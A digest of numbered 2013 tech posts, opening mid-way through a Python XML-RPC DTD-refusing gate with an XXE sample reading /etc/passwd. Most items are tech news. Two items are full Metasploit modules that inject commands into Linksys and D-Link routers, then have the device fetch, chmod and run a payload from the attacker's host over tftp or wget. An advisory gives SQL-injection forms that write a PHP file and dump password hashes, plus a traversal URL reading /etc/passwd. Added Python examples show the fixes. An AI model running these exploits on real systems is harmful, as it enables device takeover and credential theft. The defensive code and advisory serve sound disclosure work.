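    """A DOCTYPE or entity declaration was found in the request body."""


def parse_xmlrpc_call(body):
    """Parse a <methodCall>, refusing any DTD before entities can be resolved.

    Returns {"methodName": str, "params": [str, ...]} (nested arrays and
    structs are flattened to their scalar leaves). Raises UnsafeXmlRpcRequest
    on a DOCTYPE or ENTITY declaration and expat.ExpatError on malformed XML.
    """
    parser = expat.ParserCreate()
    result = {"methodName": None, "params": []}
    stack, text = [], []
    state = {"typed": False}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires for an internal subset (<!DOCTYPE foo [...]>) as in the PoC
        # and for an external one (<!DOCTYPE foo SYSTEM "...">) alike.
        raise UnsafeXmlRpcRequest(f"DOCTYPE '{name}' not allowed in XML-RPC")

    def on_entity_decl(*_):
        # Defence in depth: unreachable once every DOCTYPE is refused.
        raise UnsafeXmlRpcRequest("entity declaration not allowed")

    def on_start(tag, _attrs):
        stack.append(tag)
        text.clear()
        if tag == "value":
            state["typed"] = False

    def on_end(tag):
        stack.pop()
        value = "".join(text)
        text.clear()
        if tag == "methodName":
            result["methodName"] = value.strip()
        elif stack and stack[-1] == "value" and tag in SCALAR_TYPES:
            result["params"].append(value)
            state["typed"] = True
        elif tag == "value" and not state["typed"]:
            result["params"].append(value)  # untyped <value> is a string

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    if result["methodName"] is None:
        raise ValueError("no <methodName> in request")
    return result


def is_safe_xmlrpc_request(body):
    """True if the body parses without a DTD; usable as a pre-dispatch gate."""
    try:
        parse_xmlrpc_call(body)
        return True
    except (UnsafeXmlRpcRequest, expat.ExpatError, ValueError):
        return False


# Constructed sample: a benign call with one typed and one untyped parameter.
SAFE_REQUEST = b"""<?xml version="1.0"?>
<methodCall>
  <methodName>example.echo</methodName>
  <params>
    <param><value><string>hello</string></value></param>
    <param><value>world</value></param>
  </params>
</methodCall>"""

# The advisory's PoC body: internal subset declaring an external entity.
XXE_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>"""

# Constructed: the same class of request via an external DTD reference,
# which the gate must refuse as well (placeholder hostname).
EXTERNAL_DTD_REQUEST = b"""<?xml version="1.0"?>
<!DOCTYPE methodCall SYSTEM "http://dtd.example/external.dtd">
<methodCall><methodName>example.echo</methodName></methodCall>"""

if __name__ == "__main__":
    print(parse_xmlrpc_call(SAFE_REQUEST))
    for name, body in [("poc", XXE_REQUEST), ("external", EXTERNAL_DTD_REQUEST)]:
        print(name, "rejected" if not is_safe_xmlrpc_request(body) else "ACCEPTED")
```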
  11. The Learn the Basics webinar covers everything you'll need to get started with core Joomla! functions. Topics include launching a Joomla! site, clearing all content, installing extensions, creating new categories and articles, and developing different menu item and module types. http://www.youtube.com/watch?feature=player_embedded&v=GvMTCzoG9Lo#! Sources : Joomla! 2.5.11 Released; Learn the Basics of Joomla 2.5 - CloudAccess.net
  12. After acquiring Tumblr, Yahoo announced a major update to Flickr for desktop and Android. Yahoo unveiled the new Flickr look at a press event in New York. With this new look, Yahoo is trying to bring a few more users to the struggling brand. "Tonight is about Flickr," Yahoo CEO Marissa Mayer said. "It is about that other 'R' brand and how we can make Flickr awesome again."

At the event, Yahoo announced three major updates to Flickr. These changes are a new, cleaner design, a new Android app and more storage than any other service offers. Now the user profile has a cover photo and photo streams from the people you follow. The new design also affects the mobile site, which looks fresher and allows for swiping, as is now the norm on touch devices. This new look will be rolled out to all Yahoo users over the next few days.

Yahoo also announced that users' photos are uploaded in full resolution, while Facebook and other photo services compress photos when uploading. "We never want you to compromise a single pixel at Flickr," Cahan, SVP of Mobile Products, said from the stage. Google+ Photos also allows full-resolution photo uploads, but it comes with only 15 GB of free space. Yahoo, however, is offering a full free terabyte of storage space. No other tech company has ever offered one terabyte of storage. With this much space, you can now upload as many photos as you want in full resolution.

Yahoo acquired Flickr back in 2005. It now has more than 89 million users who have uploaded 8 billion photos. With 1 TB of free storage, Yahoo will surely get more users.

Source : Yahoo Updates Flickr with New Look, Offering 1 Terabyte Free Storage
  13. The head of RSA, EMC's security division: It is no longer a disgrace to be attacked in cyberspace, but it is to not realise that you have been attacked

As more and more cyber attacks hit companies and state institutions, there is nothing shameful any more in the managers of organisations admitting that certain confidential data has been stolen; what is embarrassing is if they do not realise that this has happened to them, said Art Coviello, CEO of RSA, the security division of the data storage company EMC, at the EMC World event held recently in the American city of Las Vegas.

He added that the biggest problem for security specialists is the ever-growing "surface" that can be attacked.

"Customers are nervous and confused about the current situation. But it is like this because we do not have a good understanding of security. The attackable surface has grown more and more. For example, if in 2007, the year the iPhone was launched, people generated ¼ zettabyte of information, last year 2.8 zettabytes were generated, and in 2020 the amount of data will be between 40 and 60 zettabytes. It will be a great opportunity to attack this data," Coviello explained.

To get a better sense of what 40 zettabytes (or 40 trillion gigabytes) means, consider that if they were saved on Blu-ray discs, their weight would equal that of 424 Nimitz aircraft carriers (approximately 100 tonnes each), according to an IDC study carried out for EMC.

"We went from the appearance of smartphones in 2007 to their ubiquity today, and we will reach the 'internet of things' in 2020. There will be over 200 billion devices connected to the internet. If in 2007 we were facing complex intrusive attacks, now they are innovative, attacks that break the mould, but in 2010 they will be destructive. Company managers must understand who could attack them and how.

The current business model was a reactive one, in which companies react after they have been attacked. The new model, towards which we should move as quickly as possible, is an intelligence-driven one, based on an understanding of the threats," the manager added.

At present, IT security budgets are split as follows: 80% for prevention, 15% for monitoring and 5% for post-attack response. "It should be 34% for prevention, 33% for monitoring and 33% for response. Among the barriers to change are the inertia managers have in spending budgets, the shortage of specialised staff that even large companies will face and the degree of technological maturity of those inside companies," said Art Coviello.

Source : http://www.wall-street.ro/articol/IT-C-Tehnologie/148791/seful-rsa-divizia-de-securitate-a-emc-nu-mai-este-o-rusine-sa-fii-atacat-cibernetic-ci-sa-nu-iti-dai-seama-ca-ai-fost-atacat.html
  14. After being launched on the iOS platform, removed from the App Store by Apple and later implemented as a web service, Bitdefender's Clueful application has come out of its test period and has also been launched on the Android platform, offering users a tool for checking the security of the applications installed on their mobile phone or tablet.

The free product from Bitdefender is simple to use: it scans all installed applications and, using data centralised by the vendor, gives the user the chance to see the possible ways in which their personal data could be put at risk. For each installed application, the app displays the security grade assigned by Bitdefender, any unwanted behaviour, the list of requested permissions and the sites the application contacts. The interface also allows quick sorting by criteria such as access to private information, use of unencrypted connections or access to location services, letting the user form a clear picture of the installed applications and the security of their data.

Bitdefender Clueful is a free product that can be installed from Google Play.

Source : Bitdefender Clueful allows analysis of the security of Android applications
  15. ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# Penetration Testing Software | Metasploit
##

require 'msf/core'
require 'rex/proto/tftp'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Linksys WRT160nv2 apply.cgi Remote Command Injection',
      'Description'    => %q{
          Some Linksys Routers are vulnerable to an authenticated OS command injection on
        their web interface where default credentials are admin/admin or admin/password.
        Since it is a blind OS command injection vulnerability, there is no output for the
        executed command when using the cmd generic payload. This module has been tested
        on a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against
        a controlled system could be used for testing purposes. The exploit uses the tftp
        client from the device to stage to native payloads from the command injection.
      },
      'Author'         =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez'                           # minor help with msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '57887' ],
          [ 'EDB', '24478' ],
          [ 'OSVDB', '90093' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-012' ]
        ],
      'DisclosureDate' => 'Feb 11 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload',
            {
              'Arch'     => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
        OptAddress.new('LHOST', [ true, 'The listen IP address from where the victim downloads the MIPS payload' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
      ], self.class)
  end

  # Sends one injected command through the Diagnostics ping form.
  def request(cmd,user,pass,uri)
    begin
      res = send_request_cgi({
        'uri'           => uri,
        'method'        => 'POST',
        'authorization' => basic_auth(user,pass),
        'vars_post'     => {
          "submit_button" => "Diagnostics",
          "change_action" => "gozila_cgi",
          "submit_type"   => "start_ping",
          "action"        => "",
          "commit"        => "0",
          "ping_ip"       => "1.1.1.1",
          "ping_size"     => "#{cmd}&",
          "ping_times"    => "5",
          "traceroute_ip" => ""
        }
      })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end

  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(4))
    uri   = '/apply.cgi'
    user  = datastore['USERNAME']
    pass  = datastore['PASSWORD']
    lhost = datastore['LHOST']

    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res = send_request_cgi({
        'uri'           => uri,
        'method'        => 'GET',
        'authorization' => basic_auth(user,pass)
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if [200, 301, 302].include?(res.code)
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end

    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      res = request(cmd,user,pass,uri)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end

    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe

    #
    # start our server
    #
    print_status("#{rhost}:#{rport} - Starting up our TFTP service")
    @tftp = Rex::Proto::TFTP::Server.new
    @tftp.register_file(downfile,@pl,true)
    @tftp.start

    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{downfile}")
    #this filename is used to store the payload on the device -> we have limited space for the filename!
    filename = rand_text_alpha_lower(4)

    #not working if we send all command together -> lets take three requests
    cmd = "tftp -l /tmp/#{filename} -r #{downfile} -g #{lhost}"
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload")
      select(nil, nil, nil, datastore['DELAY'])
    else
      wait_linux_payload
    end

    @tftp.stop
    register_file_for_cleanup("/tmp/#{filename}")

    #
    # chmod
    #
    cmd = "chmod 777 /tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    #
    # execute
    #
    cmd = "/tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
    res = request(cmd,user,pass,uri)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
  end

  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
    waited = 0
    while (not @tftp.files.length == 0)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['DELAY'])
        @tftp.stop
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
end

Source : Linksys WRT160nv2 apply.cgi Remote Command Injection
  16. ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# Penetration Testing Software | Metasploit
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link DIR615h OS Command Injection',
      'Description'    => %q{
          Some D-Link Routers are vulnerable to an authenticated OS command injection on
        their web interface, where default credentials are admin/admin or admin/password.
        Since it is a blind os command injection vulnerability, there is no output for the
        executed command when using the cmd generic payload. This module was tested against
        a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
        controlled system could be used for testing purposes. The exploit uses the wget
        client from the device to convert the command injection into an arbitrary payload
        execution.
      },
      'Author'         =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez'                           # minor help with msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '57882' ],
          [ 'EDB', '24477' ],
          [ 'OSVDB', '90174' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ]
        ],
      'DisclosureDate' => 'Feb 07 2013',
      'Privileged'     => true,
      'Platform'       => ['linux','unix'],
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'Linux mipsel Payload',
            {
              'Arch'     => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget'  => 1
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
      ], self.class)
  end

  # Sends one injected command through the ping field of the VCT tools page.
  def request(cmd)
    begin
      res = send_request_cgi({
        'uri'      => @uri,
        'method'   => 'GET',
        'vars_get' => {
          "page"         => "tools_vct",
          "hping"        => "0",
          "ping_ipaddr"  => "1.1.1.1`#{cmd}`",
          "ping6_ipaddr" => ""
        }
      })
      return res
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end
  end

  def exploit
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
    @uri = '/tools_vct.htm'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    @timeout = 5

    #
    # testing Login
    #
    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
    begin
      res = send_request_cgi({
        'uri'       => '/login.htm',
        'method'    => 'POST',
        'vars_post' => {
          "page"       => "login",
          "submitType" => "0",
          "identifier" => "",
          "sel_userid" => user,
          "userid"     => "",
          "passwd"     => pass,
          "captchapwd" => ""
        }
      })
      if res.nil? or res.code == 404
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
      if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/
        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
      else
        fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
    end

    if target.name =~ /CMD/
      if not (datastore['CMD'])
        fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
      end
      cmd = payload.encoded
      res = request(cmd)
      if (!res)
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
      else
        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
      end
      return
    end

    #thx to Juan for his awesome work on the mipsel elf support
    @pl = generate_payload_exe
    @elf_sent = false

    #
    # start our server
    #
    resource_uri = '/' + downfile

    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
      #do not use SSL
      if datastore['SSL']
        ssl_restore = true
        datastore['SSL'] = false
      end

      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
        srv_host = Rex::Socket.source_address(rhost)
      else
        srv_host = datastore['SRVHOST']
      end

      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
      start_service({'Uri' => {
        'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
      }})

      datastore['SSL'] = true if ssl_restore
    end

    #
    # download payload
    #
    print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}")
    #this filename is used to store the payload on the device
    filename = rand_text_alpha_lower(8)

    #not working if we send all command together -> lets take three requests
    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    # wait for payload download
    if (datastore['DOWNHOST'])
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload")
      select(nil, nil, nil, datastore['HTTP_DELAY'])
    else
      wait_linux_payload
    end
    register_file_for_cleanup("/tmp/#{filename}")

    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)

    #
    # chmod
    #
    cmd = "chmod 777 /tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end

    print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
    select(nil, nil, nil, @timeout)

    #
    # execute
    #
    cmd = "/tmp/#{filename}"
    print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}")
    res = request(cmd)
    if (!res)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
    end
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    #print_status("on_request_uri called: #{request.inspect}")
    if (not @pl)
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
      return
    end
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    @elf_sent = true
    send_response(cli, @pl)
  end

  # wait for the data to be sent
  def wait_linux_payload
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")

    waited = 0
    while (not @elf_sent)
      select(nil, nil, nil, 1)
      waited += 1
      if (waited > datastore['HTTP_DELAY'])
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
      end
    end
  end
end
  17. Advisory ID: HTB23154
Product: Exponent CMS
Vendor: Online Innovative Creations
Vulnerable Version(s): 2.2.0 beta 3 and probably prior
Tested Version: 2.2.0 beta 3
Vendor Notification: April 24, 2013
Vendor Patch: May 3, 2013
Public Disclosure: May 15, 2013
Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98]
CVE References: CVE-2013-3294, CVE-2013-3295
Risk Level: High
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of the vulnerable application and execute arbitrary PHP code on the vulnerable system.

1) SQL Injection in Exponent CMS: CVE-2013-3294

The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.

Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()':

<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="submit" id="btn">
</form>

The second PoC will attempt to create "/var/www/file.txt" file, containing usernames and hashed passwords of all application's users:

<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">
<input type="hidden" name="username" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- ">
<input type="submit" id="btn">
</form>

2) PHP File Inclusion in Exponent CMS: CVE-2013-3295

The vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to "/install/popup.php" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system.

The PoC code below will output the content of '/etc/passwd' file on vulnerable system:

http://[host]/install/popup.php?page=../../../../etc/passwd%00

Solution:

Upgrade to Exponent CMS v2.2.0 Release Candidate 1

More Information:
Release Candidate 1 - v2.2.0 Set Loose
Exponent CMS Forums • View topic - Exponent CMS Security Vulnerabilities Notification

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS.
[2] Exponent CMS - Exponent CMS: Open Source Content Management System | Enterprise Level Content Management | Content Management Made Simple | CMS with PHP, MySQL, and YUI - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation.
[3] Common Vulnerabilities and Exposures (CVE) - CVE - Common Vulnerabilities and Exposures (CVE) - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Source : Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities
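An added example (not Exponent CMS code, nor High-Tech Bridge's) of the include-path check that defeats the CVE-2013-3295 PoC above: the traversal sequence and the URL-encoded NUL byte are both rejected before any file is opened. INCLUDE_DIR and the page names used for the checks are constructed; the code is Python using only the standard library.

```python
"""Resolving a ?page= include parameter safely.

Added example, not Exponent CMS code. Models the pattern behind
CVE-2013-3295, where page=../../../../etc/passwd%00 reached an include(),
and applies the checks that stop traversal and NUL-byte truncation.
"""
import os
import urllib.parse

# Constructed: the only directory from which page includes may be served.
INCLUDE_DIR = "/srv/www/install/pages"
ALLOWED_EXT = (".php",)


class IncludeRejected(ValueError):
    """The requested page is malformed or outside the include directory."""


def resolve_include(raw_page, base_dir=INCLUDE_DIR):
    """Map a raw ?page= query value onto a canonical path under base_dir.

    Decodes the value once (PHP's $_GET has already done this, so a PHP port
    would skip that step), then rejects NUL bytes, absolute paths, anything
    that canonicalises outside base_dir, and disallowed extensions.
    """
    page = urllib.parse.unquote(raw_page)
    if "\x00" in page:
        # %00 truncated C strings in old PHP, so "x\0.php" opened "x".
        raise IncludeRejected("NUL byte in page name")
    if not page or os.path.isabs(page):
        raise IncludeRejected("empty or absolute page name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page))
    # commonpath beats a plain startswith(): "/srv/www/install/pages2/x.php"
    # shares the prefix but is not inside the include directory.
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeRejected("path escapes include directory")
    if not candidate.endswith(ALLOWED_EXT):
        raise IncludeRejected("extension not allowed")
    return candidate


def include_allowed(raw_page):
    """Boolean gate around resolve_include, e.g. for logging or a WAF rule."""
    try:
        resolve_include(raw_page)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    for value in ("tools.php", "sub/../tools.php",
                  "../../../../etc/passwd%00", "../../../../etc/passwd",
                  "%2e%2e/%2e%2e/%2e%2e/etc/passwd.php", "/etc/passwd"):
        print(f"{value!r:45} -> {'allow' if include_allowed(value) else 'reject'}")
```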
  18. For years we've been warned about the specter of hacker-induced nuclear power plant meltdowns, breached electric-grid control systems or Samsung TVs that let hackers watch you. We've even heard we could lose our data to juicejacking, when all we want is an emergency phone charge. The latest entrant into the scary-infrastructure category comes from a technology that feels like it should be a lot warmer and fuzzier: namely, electric car-charging stations.

The vision of electric cars calls for charge stations to perform smart charging as part of a global smart grid. As a result, a charge station is a sophisticated computer that communicates with the electric grid on one side and the car on the other. To make matters worse, it's installed outside on street corners and in parking lots. Electric vehicle charging stations bring with them new security challenges that show issues similar to those found in SCADA systems, even if they use different technologies.

In this video recorded at Hack In The Box 2013 Amsterdam, Ofer Shezaf, founder of OWASP Israel, talks about what charge stations really are, why they have to be 'smart' and the potential risks created to the grid, to the car and most importantly to its owner's privacy and safety.

Sources : Hacking charge stations for electric cars; HITBSECCONF2013 - AMSTERDAM
  19. iOS 7 - a flat, totally new and different experience, without frills

The new interface is "very flat", not at all glossy and without frills. It will please the new user, but will unsettle the iOS fan, through the flatness it seems to borrow from Windows Phone and its Metro UI.

What do we mean by "flat" and "without frills"? It is mainly about simplicity and about giving up heavy textures and the imitation of real objects within the interface. The concept behind the change is that new generations will not resonate with the idea of a yellow notepad associated with the iOS Notes application. Likewise, that leather-bound agenda serving as a calendar may seem outdated to some.

For those who are already worried, getting used to the new platform will not become harder, because its fundamental aspects will remain the same. Apple is also studying ways to integrate information that is easier to see, at least in the notifications area. We may also see side panels for the notifications area, to extend the amount of information, and these panels would be accessed with lateral swipes. Years ago Apple also tested multitasking panels similar to those on BlackBerry 10 OS, which would not necessarily be a bad thing.

Source : Inside details about iOS 7: a flat, totally new and different experience, without frills | Mobilissimo.ro
  20. The US Department of Defense (DoD) announced on Thursday that it has approved the use of Samsung phones running a hardened version of Android. According to the BBC, the approval for other types of smartphones and mobile devices for use by US soldiers is coming soon. Specifically, approval for other Android devices and for Apple phones and tablets is expected later this month.

According to Federal News Radio, the move is part of a broader DoD plan to more than double the number of secure mobile devices used by armed forces by 2014. The approved Samsung smartphones will run a hardened version of Android called Knox. The Pentagon has also given a nod to several recent BlackBerry products, which Federal News Radio refers to as "the overwhelming incumbent in the market for DoD handhelds".

According to the BBC, the DoD also plans to build a secure system to manage the new mobile devices and their associated app stores and is now assessing associated commercial bids. Each smartphone will have to undergo vetting to ensure that neither the smartphone nor its operating system has security vulnerabilities, according to The Hill.

The timing on the approval of smartphone use supports a move to a new, "on-the-move" satellite-based network about which the US Army issued a statement in March. The network is designed to keep troops connected over "vast" distances, allowing information to flow throughout the brigade down to on-the-ground soldiers as they assist in the drawdown of US forces. Army officials said that the satellite-based systems, which also incorporate data radios, handheld devices and mission command software, will transmit voice/chat communications and situational awareness data.

This type of constant communication is "much needed" in Afghanistan, said Brig. Gen. Walter E. Piatt: "Imagine you're a soldier and you need information on a given area, or you want to see where units are located to your left and right... You don't want to have to come back to headquarters; you don't want to have to force a transmission over a radio net just to get that. You want to have that information readily available. [This network] allows us to do that on the move, and allows us to do it dismounted as well."

According to The Hill, the devices going along to help soldiers with this dangerous work have been hardened to military specifications and run off of secure DoD networks. That's a relief, given how pathetically the devices performed when initially tested in November 2011. Back then, active duty soldiers tried out two mobile apps: a tracking system designed to locate friendly battlefield forces and a digital interpreter to help troops communicate with Iraqis and Afghans. These are the problems that cropped up:

- Troops who were standing next to each other showed up kilometers apart.
- Specific dialects and slang from rural Afghanistan stumped the digital interpreter.
- The system's connection to the Army network dropped out repeatedly, leaving soldiers out of contact with their units.
- Excessive bandwidth use forced soldiers to wait minutes before the apps would start working.

But while those problems have apparently been overcome, there are still kinks to be worked out. For example, reports say that the DoD hasn't yet figured out how to handle two-factor authentication with the new mobile devices, though officials would love to drop what Federal News Radio refers to as the "clumsy" add-on smart card readers that are now capturing credentials from users' common access cards.

Source : Pentagon OKs Androids, BlackBerrys for soldiers | Naked Security
